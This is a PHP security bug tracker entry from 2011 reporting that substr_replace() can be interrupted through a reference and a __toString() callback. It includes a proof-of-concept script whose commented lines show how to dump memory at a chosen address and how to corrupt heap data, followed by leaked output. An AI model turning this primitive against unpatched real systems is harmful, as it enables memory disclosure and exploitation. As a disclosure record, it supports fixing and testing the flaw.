PHP :: Sec Bug #55871 :: Interruption in substr_replace()
| Sec Bug #55871 | Interruption in substr_replace() | ||||
|---|---|---|---|---|---|
| Submitted: | 2011-10-08 09:38 UTC | Modified: | 2015-04-26 12:52 UTC | ||
| From: | worawita at gmail dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | Strings related | ||
| PHP Version: | 5.3 | OS: | * | ||
| Private report: | No | CVE-ID: | None | ||
[2011-10-08 09:38 UTC] worawita at gmail dot com
Description:
------------
substr_replace() function can be interrupted and used for information leakage/memory corruption/use-after-free(>=5.3.7) due to pass by reference in array.
The below test script causes "Segmentation Fault" in PHP with Suhosin patch.
Test script:
---------------
<?php
class dummy {
public function __toString() {
//$GLOBALS['my_var'] += 0x08048000; // dump memory at 0x08048000
//$GLOBALS['my_var'] .= 'AAAAAAAA'; // memory corruption
preg_match('//', '', $GLOBALS['my_var']); // dump HashTable data (and use-after-free in >=5.3.7)
return '';
}
}
$my_var = str_repeat('A', 40);
$out = substr_replace(array(&$my_var), array(new dummy), 40, 0);
var_dump($out);
Expected result:
----------------
array(1) {
[0]=>
string(40) "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
Actual result:
--------------
array(1) {
[0]=>
string(40) ☺ ☺ ≥ò≥ò≥ò☻└±ò☻@δKk ☺t"
}
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2012-01-02 00:47 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
[2012-01-09 13:30 UTC] worawita at gmail dot com
[2012-03-13 07:26 UTC] stas@php.net
-Status: Closed +Status: Re-Opened -PHP Version: Irrelevant +PHP Version: 5.3
[2012-05-13 15:13 UTC] felipe@php.net
-Status: Re-Opened +Status: Assigned -Private report: No +Private report: Yes
[2012-07-04 11:37 UTC] felipe@php.net
-Status: Assigned +Status: Closed